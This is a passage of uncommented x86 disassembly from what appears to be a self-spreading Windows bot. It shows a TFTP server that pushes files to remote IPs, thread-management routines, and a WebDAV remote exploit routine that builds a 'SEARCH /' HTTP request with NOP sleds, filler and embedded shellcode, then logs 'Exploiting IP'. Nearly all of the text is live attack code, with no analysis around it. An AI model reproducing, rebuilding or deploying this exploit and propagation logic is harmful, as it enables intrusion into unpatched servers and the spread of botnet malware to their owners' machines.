push [ebp+74h+var_168]
imul eax, 234h
mov dword_434344[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_4335EC
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_433578
cmp eax, 0FFFFFFFFh
jnz short loc_410B3D
push 1388h
call ds:dword_41F000
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_410EDB
; ---------------------------------------------------------------------------
loc_410B3D: ; CODE XREF: sub_410A22+100�j
lea eax, [ebp+74h+var_378]
push offset dword_41F968
push eax
call sub_413393
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_410BB6
push 190h
call ds:dword_41F000
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_412BB5
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
push [ebp+74h+var_170]
call sub_4111AE
add esp, 28h
jmp loc_410EC8
; ---------------------------------------------------------------------------
loc_410BB6: ; CODE XREF: sub_410A22+133�j
mov esi, 200h
loc_410BBB: ; CODE XREF: sub_410A22+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_410E9C
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_433544
test eax, eax
jle loc_410E90
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_433438
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_433520
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_412BB5
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_410E78
cmp [ebp+74h+var_D7], 1
jnz loc_410DD3
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_410C7D: ; CODE XREF: sub_410A22+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410C7D
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_410C92: ; CODE XREF: sub_410A22+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410C92
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_414380
add esp, 0Ch
test eax, eax
jnz loc_410D91
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_410CBD: ; CODE XREF: sub_410A22+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410CBD
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_414380
add esp, 0Ch
test eax, eax
jnz loc_410D91
push ebx
push ebx
push [ebp+74h+var_8]
call sub_414898
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_41313E
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_433470
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_410D4B: ; CODE XREF: sub_410A22+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_410D7F
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
add esp, 14h
loc_410D7F: ; CODE XREF: sub_410A22+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
pop ecx
jmp loc_410E90
; ---------------------------------------------------------------------------
loc_410D91: ; CODE XREF: sub_410A22+28F�j
; sub_410A22+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_42734C
push [ebp+74h+var_4]
call dword_433470
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_412BB5
lea eax, [ebp+74h+var_D8]
push eax
call sub_401C33
add esp, 14h
jmp loc_410E90
; ---------------------------------------------------------------------------
loc_410DD3: ; CODE XREF: sub_410A22+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_410E78
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_410E01
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_410E09
; ---------------------------------------------------------------------------
loc_410E01: ; CODE XREF: sub_410A22+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_410E09: ; CODE XREF: sub_410A22+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_414898
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_41313E
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_433470
cmp edi, ebx
jnz short loc_410E90
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_410D4B
; ---------------------------------------------------------------------------
loc_410E78: ; CODE XREF: sub_410A22+242�j
; sub_410A22+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_4272EC
push [ebp+74h+var_4]
call dword_433470
loc_410E90: ; CODE XREF: sub_410A22+1E9�j
; sub_410A22+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_410BBB
mov edi, [ebp+74h+arg_0]
loc_410E9C: ; CODE XREF: sub_410A22+1A2�j
push [ebp+74h+var_4]
call dword_4335AC
push [ebp+74h+var_8]
call sub_412F93
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_410ECF
push [ebp+74h+var_170]
call sub_4111AE
loc_410EC7: ; CODE XREF: sub_410A22+B7�j
pop ecx
loc_410EC8: ; CODE XREF: sub_410A22+18F�j
push ebx
call ds:dword_41F014
loc_410ECF: ; CODE XREF: sub_410A22+498�j
push 3E8h
call ds:dword_41F000
push edi
loc_410EDB: ; CODE XREF: sub_410A22+116�j
call sub_410A22
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_410A22 endp
; =============== S U B R O U T I N E =======================================
sub_410EEA proc near ; CODE XREF: sub_401141+F0�p
; sub_401141+23D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_434138
loc_410EF2: ; CODE XREF: sub_410EEA+18�j
cmp byte ptr [eax], 0
jz short loc_410F06
add eax, 234h
inc edi
cmp eax, offset dword_478EC8
jl short loc_410EF2
jmp short loc_410F51
; ---------------------------------------------------------------------------
loc_410F06: ; CODE XREF: sub_410EEA+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_434138[esi]
push eax
call sub_412C40
mov eax, [esp+14h+arg_4]
and dword_43433C[esi], 0
and dword_434340[esi], 0
mov dword_434338[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_434350[esi], 0
mov dword_434344[esi], eax
pop esi
loc_410F51: ; CODE XREF: sub_410EEA+1A�j
mov eax, edi
pop edi
retn
sub_410EEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F55 proc near ; CODE XREF: sub_4111EB+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_434138
loc_410F7F: ; CODE XREF: sub_410F55+78�j
cmp byte ptr [esi], 0
jz short loc_410FC0
cmp [ebp+arg_C], 0
jnz short loc_410F93
cmp dword ptr [esi+204h], 0
jnz short loc_410FC0
loc_410F93: ; CODE XREF: sub_410F55+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
loc_410FC0: ; CODE XREF: sub_410F55+2D�j
; sub_410F55+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_478EC8
jl short loc_410F7F
pop edi
pop esi
leave
retn
sub_410F55 endp
; =============== S U B R O U T I N E =======================================
sub_410FD3 proc near ; CODE XREF: sub_4078FA+38DC�p
; sub_41105B+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_411055
cmp esi, 1F4h
jge short loc_411055
imul esi, 234h
push edi
push ebx
lea edi, dword_43434C[esi]
push dword ptr [edi]
call ds:dword_41F0C8
cmp [edi], ebx
jz short loc_411005
inc ebp
loc_411005: ; CODE XREF: sub_410FD3+2F�j
mov [edi], ebx
lea edi, dword_434340[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_434338[esi], ebx
mov dword_43433C[esi], ebx
jbe short loc_411026
push eax
call sub_4074C6
pop ecx
loc_411026: ; CODE XREF: sub_410FD3+4A�j
mov [edi], ebx
lea edi, dword_434344[esi]
push dword ptr [edi]
mov byte ptr dword_434138[esi], bl
mov byte_434350[esi], bl
call dword_4335AC
lea esi, dword_434348[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_4335AC
mov [esi], ebx
pop edi
loc_411055: ; CODE XREF: sub_410FD3+D�j
; sub_410FD3+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_410FD3 endp
; =============== S U B R O U T I N E =======================================
sub_41105B proc near ; CODE XREF: sub_402795+18�p
; sub_4078FA+3895�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_434138
loc_411067: ; CODE XREF: sub_41105B+2A�j
cmp byte ptr [esi], 0
jz short loc_411078
push edi
call sub_410FD3
test eax, eax
pop ecx
jz short loc_411078
inc ebx
loc_411078: ; CODE XREF: sub_41105B+F�j
; sub_41105B+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_478EC8
jl short loc_411067
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_41105B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41108D proc near ; CODE XREF: sub_411120+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43433C
loc_4110A1: ; CODE XREF: sub_41108D+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_4110C3
test edi, edi
jle short loc_4110B5
cmp [esi], edi
jz short loc_4110B5
cmp ebx, edi
jnz short loc_4110C3
loc_4110B5: ; CODE XREF: sub_41108D+1E�j
; sub_41108D+22�j
push ebx
call sub_410FD3
test eax, eax
pop ecx
jz short loc_4110C3
inc [ebp+var_4]
loc_4110C3: ; CODE XREF: sub_41108D+1A�j
; sub_41108D+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4790CC
jl short loc_4110A1
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41108D endp
; =============== S U B R O U T I N E =======================================
sub_4110DA proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_434338
loc_4110E1: ; CODE XREF: sub_4110DA+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_4110EA
inc eax
loc_4110EA: ; CODE XREF: sub_4110DA+D�j
add ecx, 234h
cmp ecx, offset dword_4790C8
jl short loc_4110E1
retn
sub_4110DA endp
; =============== S U B R O U T I N E =======================================
sub_4110F9 proc near ; CODE XREF: sub_4078FA+4139�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_434338
push esi
loc_411103: ; CODE XREF: sub_4110F9+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_41111C
add ecx, 234h
inc edx
cmp ecx, offset dword_4790C8
jl short loc_411103
pop esi
retn
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_4110F9+10�j
mov eax, edx
pop esi
retn
sub_4110F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411120 proc near ; CODE XREF: sub_4078FA+1EA8�p
; sub_4078FA+4863�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_411139
push [ebp+arg_1C]
call sub_412F42
pop ecx
loc_411139: ; CODE XREF: sub_411120+E�j
push eax
push [ebp+arg_18]
call sub_41108D
test eax, eax
pop ecx
pop ecx
jle short loc_411165
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_412BB5
add esp, 14h
jmp short loc_41117F
; ---------------------------------------------------------------------------
loc_411165: ; CODE XREF: sub_411120+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_412BB5
add esp, 10h
loc_41117F: ; CODE XREF: sub_411120+43�j
cmp [ebp+arg_C], 0
jnz short loc_41119F
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_41119F: ; CODE XREF: sub_411120+63�j
lea eax, [ebp+var_200]
push eax
call sub_401C33
pop ecx
leave
retn
sub_411120 endp
; =============== S U B R O U T I N E =======================================
sub_4111AE proc near ; CODE XREF: sub_40169B+227�p
; sub_4018D1+244�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_43434C[eax], ecx
mov dword_434338[eax], ecx
mov dword_43433C[eax], ecx
mov dword_434340[eax], ecx
mov dword_434344[eax], ecx
mov dword_434348[eax], ecx
mov byte ptr dword_434138[eax], cl
mov byte_434350[eax], cl
retn
sub_4111AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4111EB proc near ; DATA XREF: sub_4078FA+46CC�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_410F55
push [ebp+74h+var_14]
call sub_4111AE
add esp, 14h
push 0
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_4111EB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411235 proc near ; CODE XREF: sub_40169B+1F8�p
; DATA XREF: .data:off_42A06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_98 = byte ptr 0A0h
arg_124 = dword ptr 12Ch
arg_12C = dword ptr 134h
arg_134 = dword ptr 13Ch
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
mov eax, 1210h
call sub_412DD0
push 6
push 1
push 2
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41125A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41125A: ; CODE XREF: sub_411235+1F�j
push ebx
push esi
push edi
push [ebp+arg_124]
call dword_4335EC
lea eax, [ebp+arg_4]
push eax
call dword_433514
push 186A0h
call sub_41344D
mov edi, 1000h
push edi
mov ebx, eax
call sub_41344D
pop ecx
pop ecx
push offset byte_42AED0
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_406C33
pop ecx
push eax
push edi
push esi
call sub_40F790
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_4112CF
push ebx
call sub_412FE4
push esi
call sub_412FE4
pop ecx
pop ecx
push [ebp+var_10]
loc_4112C2: ; CODE XREF: sub_411235+27B�j
call dword_4335AC
xor eax, eax
jmp loc_41154F
; ---------------------------------------------------------------------------
loc_4112CF: ; CODE XREF: sub_411235+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_411310: ; CODE XREF: sub_411235+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411310
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_41134E
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_41134E: ; CODE XREF: sub_411235+F5�j
mov eax, offset loc_42B408
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_41135B: ; CODE XREF: sub_411235+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41135B
sub edi, [ebp+var_4]
jmp short loc_41137C
; ---------------------------------------------------------------------------
loc_411367: ; CODE XREF: sub_411235+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_411372: ; CODE XREF: sub_411235+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_411372
sub edi, [ebp+var_4]
loc_41137C: ; CODE XREF: sub_411235+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_411367
lea esi, [edi+1]
loc_41138F: ; CODE XREF: sub_411235+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41138F
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_4113B0: ; CODE XREF: sub_411235+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4113B0
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_4113CA: ; CODE XREF: sub_411235+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4113CA
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_4113DA: ; CODE XREF: sub_411235+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4113DA
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_412BB5
add esp, 10h
mov eax, esi
loc_4113FF: ; CODE XREF: sub_411235+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4113FF
mov edi, ebx
sub eax, esi
dec edi
loc_41140B: ; CODE XREF: sub_411235+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_41140B
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_411426: ; CODE XREF: sub_411235+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411426
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_41143F: ; CODE XREF: sub_411235+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41143F
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_41145A: ; CODE XREF: sub_411235+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41145A
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_411482: ; CODE XREF: sub_411235+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411482
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_4114B5
push ebx
call sub_412FE4
push [ebp+var_C]
call sub_412FE4
pop ecx
pop ecx
push esi
jmp loc_4112C2
; ---------------------------------------------------------------------------
loc_4114B5: ; CODE XREF: sub_411235+268�j
push edi
push 1388h
push ebx
push esi
call dword_433414
push ebx
call sub_412FE4
push [ebp+var_C]
call sub_412FE4
pop ecx
pop ecx
push esi
call dword_4335AC
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_12C]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_412E0D
add esp, 14h
cmp [ebp+arg_138], edi
jnz short loc_41152E
push edi
push [ebp+arg_134]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_98]
push eax
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_41152E: ; CODE XREF: sub_411235+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401C33
mov eax, [ebp+arg_12C]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_41154F: ; CODE XREF: sub_411235+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_411235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411554 proc near ; CODE XREF: sub_4115E8+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_411575
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_411575: ; CODE XREF: sub_411554+19�j
push ebx
push esi
loc_411577: ; CODE XREF: sub_411554+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_411585
cmp [ebp+var_4], eax
jnz short loc_4115CD
loc_411585: ; CODE XREF: sub_411554+2A�j
test edi, edi
jnz short loc_4115C2
cmp bl, 2Dh
jnz short loc_4115B6
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_4115B6
cmp al, 5Dh
jz short loc_4115B6
cmp [ebp+var_4], edi
jnz short loc_4115B6
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_4115C2
cmp bl, al
jg short loc_4115C2
mov [edx], esi
jmp short loc_4115BF
; ---------------------------------------------------------------------------
loc_4115B6: ; CODE XREF: sub_411554+38�j
; sub_411554+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_4115C2
loc_4115BF: ; CODE XREF: sub_411554+60�j
xor edi, edi
inc edi
loc_4115C2: ; CODE XREF: sub_411554+33�j
; sub_411554+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_411577
; ---------------------------------------------------------------------------
loc_4115CD: ; CODE XREF: sub_411554+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4115DA
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4115DA: ; CODE XREF: sub_411554+7E�j
cmp edi, eax
jnz short loc_4115E3
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4115E3: ; CODE XREF: sub_411554+88�j
mov eax, edi
pop edi
leave
retn
sub_411554 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115E8 proc near ; CODE XREF: sub_4078FA+57C2�p
; sub_41167C+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41164A
; ---------------------------------------------------------------------------
loc_4115F4: ; CODE XREF: sub_4115E8+66�j
cmp eax, 1
jnz short loc_41165B
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41165B
cmp cl, 2Ah
jz short loc_411633
cmp cl, 3Fh
jz short loc_411618
cmp cl, 5Bh
jz short loc_41161D
xor eax, eax
cmp cl, dl
setz al
loc_411618: ; CODE XREF: sub_4115E8+22�j
inc [ebp+arg_4]
jmp short loc_411646
; ---------------------------------------------------------------------------
loc_41161D: ; CODE XREF: sub_4115E8+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_411554
mov esi, [ebp+arg_0]
jmp short loc_411644
; ---------------------------------------------------------------------------
loc_411633: ; CODE XREF: sub_4115E8+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41167C
mov esi, [ebp+arg_0]
dec esi
loc_411644: ; CODE XREF: sub_4115E8+49�j
pop ecx
pop ecx
loc_411646: ; CODE XREF: sub_4115E8+33�j
inc esi
mov [ebp+arg_0], esi
loc_41164A: ; CODE XREF: sub_4115E8+A�j
mov cl, [esi]
test cl, cl
jnz short loc_4115F4
jmp short loc_41165B
; ---------------------------------------------------------------------------
loc_411652: ; CODE XREF: sub_4115E8+76�j
cmp eax, 1
jnz short loc_411677
inc esi
mov [ebp+arg_0], esi
loc_41165B: ; CODE XREF: sub_4115E8+F�j
; sub_4115E8+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_411652
cmp eax, 1
jnz short loc_411677
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_411677
cmp byte ptr [esi], 0
jnz short loc_411677
xor eax, eax
inc eax
jmp short loc_411679
; ---------------------------------------------------------------------------
loc_411677: ; CODE XREF: sub_4115E8+6D�j
; sub_4115E8+7B�j ...
xor eax, eax
loc_411679: ; CODE XREF: sub_4115E8+8D�j
pop esi
pop ebp
retn
sub_4115E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
